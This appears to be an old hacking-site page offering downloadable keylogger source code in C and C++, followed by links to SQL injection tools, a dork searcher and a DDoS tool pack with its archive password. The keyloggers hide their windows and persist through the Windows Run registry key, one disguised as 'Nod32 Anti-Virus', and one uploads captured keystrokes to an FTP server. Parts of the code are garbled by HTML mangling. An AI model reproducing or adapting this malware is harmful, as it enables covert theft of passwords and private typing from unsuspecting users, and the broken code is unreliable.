C# Local Keylogger

28 Kasım 2008

#include
#include
#define KEY "Nod32Bak.exe"

int keylogging(void)
{
short lul;
while(1)
{
sleep(5);
for(lul=8;lul<=222;lul++)
{
if(GetAsyncKeyState(lul)==-32767)
{
FILE *fp;
fp = fopen("C:\\WINDOWS\\system\\KL-Logs.log","a+");
if(fp == NULL)
{
return 1;
}
if(fp != NULL)
{
if((lul >= 39) && (lul <= 64))
{
fputc(lul,fp);
fclose(fp);
break;
}
else if((lul > 64) && (lul < 91))
{
lul+=32;
fputc(lul,fp);
fclose(fp);
break;
}
else
{
switch(lul)
{
case VK_SPACE:
fputc(' ',fp);
fclose(fp);
break;
case VK_SHIFT:
fputs("[SHIFT]",fp);
printf("[SHIFT]");
fclose(fp);
break;
case VK_RETURN:
fputs("\n[ENTER]",fp);
fclose(fp);
break;
case VK_BACK:
fputs("[BACKSPACE]",fp);
fclose(fp);
break;
case VK_TAB:
fputs("[TAB]",fp);
fclose(fp);
break;
case VK_CONTROL:
fputs("[CTRL]",fp);
fclose(fp);
break;
case VK_DELETE:
fputs("[DEL]",fp);
fclose(fp);
break;
case VK_OEM_1:
fputs("[;:]",fp);
fclose(fp);
break;
case VK_OEM_2:
fputs("[/?]",fp);
fclose(fp);
break;
case VK_OEM_3:
fputs("[`~]",fp);
fclose(fp);
break;
case VK_OEM_4:
fputs("[ [{ ]",fp);
fclose(fp);
break;
case VK_OEM_5:
fputs("[\\|]",fp);
fclose(fp);
break;
case VK_OEM_6:
fputs("[ ]} ]",fp);
fclose(fp);
break;
case VK_OEM_7:
fputs("['\"]",fp);
fclose(fp);
break;
case VK_NUMPAD0:
fputc('0',fp);
fclose(fp);
break;
case VK_NUMPAD1:
fputc('1',fp);
fclose(fp);
break;
case VK_NUMPAD2:
fputc('2',fp);
fclose(fp);
break;
case VK_NUMPAD3:
fputc('3',fp);
fclose(fp);
break;
case VK_NUMPAD4:
fputc('4',fp);
fclose(fp);
break;
case VK_NUMPAD5:
fputc('5',fp);
fclose(fp);
break;
case VK_NUMPAD6:
fputc('6',fp);
fclose(fp);
break;
case VK_NUMPAD7:
fputc('7',fp);
fclose(fp);
break;
case VK_NUMPAD8:
fputc('8',fp);
fclose(fp);
break;
case VK_NUMPAD9:
fputc('9',fp);
fclose(fp);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",fp);
fclose(fp);
break;
default:
fclose(fp);
break;
}
}
}
}
}
}
}
int main(int argc, char **argv)
{
HKEY lolz;
CopyFile("Keylogger.exe", "c:\\windows\\system32\\Nod32Bak.exe", 0);

HWND own = FindWindow(0,argv[0]);
ShowWindow(own, SW_HIDE);

RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&lolz, 0);

RegSetValueExA(lolz,
"Nod32 Anti-Virus",
0,
REG_SZ,
KEY,
50);

RegCloseKey(lolz);

CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging,0,0,0);
system("pause");
}


Download : C# Local Keylogger

C++ Simple Keylogger (3)

#include 
#include
#include
#include
#include
#include
#include
#include

void Upload()
{
// get the date and time for filename
time_t t;
struct tm *ts;
t = time(NULL);
ts = localtime(&t);
char* filename = asctime(ts);
// -----------------------------------

/* establashing ftp connection to configured server and uploads the file
don´t forget to change server, user and password! */
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet,"ftp_server",INTERNET_DEFAULT_FTP_PORT, "username","password", INTERNET_SERVICE_FTP, 0,0 );
FtpPutFile(hFtpSession, "C:\\RECYCLER\\0829-83829287-10293-102ISO.log", filename, FTP_TRANSFER_TYPE_BINARY, 0);

InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
}



std::string GetKey(int Key)
{
std::string KeyString = "";
if (Key == 8)
KeyString = "[delete]";
else if (Key == 13)
KeyString = "\n";
else if (Key == 32)
KeyString = " ";
else if (Key == VK_PAUSE)
KeyString = "[PAUSE]";
else if (Key == VK_CAPITAL)
KeyString = "[CAPITAL]";
else if (Key == VK_SHIFT)
KeyString = "[SHIFT]";
else if (Key == VK_TAB)
KeyString = "[TABULATOR]";
else if (Key == VK_CONTROL)
KeyString = "[CTRL]";
else if (Key == VK_ESCAPE)
KeyString = "[ESCAPE]";
else if (Key == VK_END)
KeyString = "[END]";
else if (Key == VK_HOME)
KeyString = "[HOME]";
else if (Key == VK_LEFT)
KeyString = "[left]";
else if (Key == VK_RIGHT)
KeyString = "[right]";
else if (Key == VK_UP)
KeyString = "[UP]";
else if (Key == VK_DOWN)
KeyString = "[DOWN]";
else if (Key == VK_SNAPSHOT)
KeyString = "[SNAPSHOT]";
else if (Key == VK_NUMLOCK)
KeyString = "[NUMLOCK]";
else if (Key == 190 || Key == 110)
KeyString = ".";
else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < keystring =" Key;"> 64 && Key < 91) { if (GetKeyState(VK_CAPITAL)) KeyString = Key; else { Key = Key + 32; KeyString = Key; } } } return KeyString; } int main() { HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); Upload(); std::string Filename = "C:\\RECYCLER\\0829-83829287-10293-102ISO.log"; std::string TempString = ""; std::fstream FStream; FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app); TCHAR szPath[MAX_PATH]; GetModuleFileName(NULL, szPath, MAX_PATH); /* Create a New HKEY. */ HKEY newValue; /* Open Registry key. */ RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &newValue); /* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the current user only. Now give a new value. Syntax for RegSetValueEx() function is LONG WINAPI RegSetValueEx( __in HKEY hKey, __in_opt LPCTSTR lpValueName, __reserved DWORD Reserved, __in DWORD dwType, __in_opt const BYTE* lpData, __in DWORD cbData ); More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */ RegSetValueEx(newValue, "tcp.exe", 0, REG_SZ, (LPBYTE)szPath, sizeof(szPath)); /* Close the key. */ RegCloseKey(newValue); while(true) { Sleep(5); for(int i = 8; i < 191; i++) { if(GetAsyncKeyState(i)&1 ==1) { TempString = GetKey (i); FStream.write(TempString.c_str(), TempString.size()); FStream.close(); FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

}

}

}

}




Download : C++ Simple Keylogger (3)

C++ Simple Keylogger (2)

#include
#include
#include
#include


std::string GetKey(int Key)
{
std::string KeyString = "";

if (Key == 8)
KeyString = "[delete]";
else if (Key == 13)
KeyString = "\n";
else if (Key == 32)
KeyString = " ";
else if (Key == VK_PAUSE)
KeyString = "[PAUSE]";
else if (Key == VK_CAPITAL)
KeyString = "[CAPITAL]";
else if (Key == VK_SHIFT)
KeyString = "[SHIFT]";
else if (Key == VK_TAB)
KeyString = "[TABULATOR]";
else if (Key == VK_CONTROL)
KeyString = "[CTRL]";
else if (Key == VK_ESCAPE)
KeyString = "[ESCAPE]";
else if (Key == VK_END)
KeyString = "[END]";
else if (Key == VK_HOME)
KeyString = "[HOME]";
else if (Key == VK_LEFT)
KeyString = "[left]";
else if (Key == VK_RIGHT)
KeyString = "[right]";
else if (Key == VK_UP)
KeyString = "[UP]";
else if (Key == VK_DOWN)
KeyString = "[DOWN]";
else if (Key == VK_SNAPSHOT)
KeyString = "[SNAPSHOT]";
else if (Key == VK_NUMLOCK)
KeyString = "[NUMLOCK]";
else if (Key == 190 || Key == 110)
KeyString = ".";
else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < keystring =" Key;"> 64 && Key < 91)
{
if (GetKeyState(VK_CAPITAL))
KeyString = Key;
else
{
Key = Key + 32;
KeyString = Key;
}
}
}

return KeyString;
}

int main()
{
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);
std::string Filename = "C:\\log.txt";
std::string TempString = "";
std::fstream FStream;
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
/* Grab filename of process/exe using GetModuleFileName() function. */
TCHAR szPath[MAX_PATH];


GetModuleFileName(NULL,
szPath,
MAX_PATH);


/* Create a New HKEY. */
HKEY newValue;

/* Open Registry key. */

RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&newValue);

/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the

current user only.

Now give a new value.

Syntax for RegSetValueEx() function is
LONG WINAPI RegSetValueEx(
__in HKEY hKey,
__in_opt LPCTSTR lpValueName,

__reserved DWORD Reserved,
__in DWORD dwType,
__in_opt const BYTE* lpData,
__in DWORD cbData
);

More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */


RegSetValueEx(newValue,
"keylogger2.exe",
0,

REG_SZ,
(LPBYTE)szPath,
sizeof(szPath));


/* Close the key. */
RegCloseKey(newValue);
return 0;
}

while(true)
{

Sleep(5);

for(int i = 8; i < 191; i++)
{
if(GetAsyncKeyState(i)&1 ==1)
{
TempString = GetKey (i);

FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}


Download : C++ Simple Keylogger (2)

C++ Simple Keylogger (1)

#include
#include
#include
#include


std::string GetKey(int Key)
{
std::string KeyString = "";

if (Key == 8)
KeyString = "[delete]";
else if (Key == 13)
KeyString = "\n";
else if (Key == 32)
KeyString = " ";
else if (Key == VK_PAUSE)
KeyString = "[PAUSE]";
else if (Key == VK_CAPITAL)
KeyString = "[CAPITAL]";
else if (Key == VK_SHIFT)
KeyString = "[SHIFT]";
else if (Key == VK_TAB)
KeyString = "[TABULATOR]";
else if (Key == VK_CONTROL)
KeyString = "[CTRL]";
else if (Key == VK_ESCAPE)
KeyString = "[ESCAPE]";
else if (Key == VK_END)
KeyString = "[END]";
else if (Key == VK_HOME)
KeyString = "[HOME]";
else if (Key == VK_LEFT)
KeyString = "[left]";
else if (Key == VK_RIGHT)
KeyString = "[right]";
else if (Key == VK_UP)
KeyString = "[UP]";
else if (Key == VK_DOWN)
KeyString = "[DOWN]";
else if (Key == VK_SNAPSHOT)
KeyString = "[SNAPSHOT]";
else if (Key == VK_NUMLOCK)
KeyString = "[NUMLOCK]";
else if (Key == 190 || Key == 110)
KeyString = ".";
else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < keystring =" Key;"> 64 && Key < 91)
{
if (GetKeyState(VK_CAPITAL))
KeyString = Key;
else
{
Key = Key + 32;
KeyString = Key;
}
}
}

return KeyString;
}

int main()
{
std::string Filename = "C:\\log.txt";
std::string TempString = "";
std::fstream FStream;
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

while(true)
{

Sleep(5);

for(int i = 8; i < 191; i++)
{
if(GetAsyncKeyState(i)&1 ==1)
{
TempString = GetKey (i);

FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}

Download : C++ Simple Keylogger (1)

PHP SQL İnject Tool

Jet SQL İntection Tool

Dark-Dork Searcher




30 DDos Tools

http://i19.tinypic.com/823uo9e.jpg



Download : 30 Ddos Tools

rar pass : canvas